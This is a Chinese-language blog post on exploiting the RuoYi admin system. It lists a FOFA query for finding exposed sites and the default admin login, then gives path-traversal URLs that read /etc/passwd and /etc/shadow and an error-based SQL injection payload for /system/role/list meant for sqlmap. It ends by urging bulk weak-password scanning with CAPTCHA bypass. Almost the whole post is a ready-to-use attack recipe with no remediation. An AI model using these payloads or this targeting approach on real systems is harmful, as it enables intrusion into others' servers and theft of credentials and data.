若依(RuoYi)管理系统 后台任意文件读取,SQL注入
一、若依管理系统简介
基于SpringBoot的权限管理系统 易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用
二、若依管理系统后台任意文件下载
该漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码
fofa搜索语句:app=”若依-管理系统”
账号:admin
密码:admin123
登陆成功后直接访问
http://目标网站url/common/download/resource?resource=/profile/../../../../etc/passwd
http://目标网站url//common/download/resource?resource=/profile/../../../../etc/shadow
三、若依管理系统SQL注入漏洞
该漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码
直接burp抓包构造POST请求数据包(构建关键点)
1.POST请求
2.请求目录/system/role/list
3.请求POC(见下文)
POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and
extractvalue(1,concat(0x7e,substring((*),1,32),0x7e))
POC我直接写的星号指定注入位置,可以直接放到sqlmap中去跑,不指定位置sqlmap跑不出来(可能是我太笨了)
ps:有兴趣的同学可以写个脚本去跑(大佬和小白就不用看了,闲人专享)
简单思路可以先去批量去跑弱口令,这个很快,验证码是可以通过验证码识别网站去绕过的,登陆到后台之后构建请求包,博主已经实现了,代码过于杂乱就不分享了。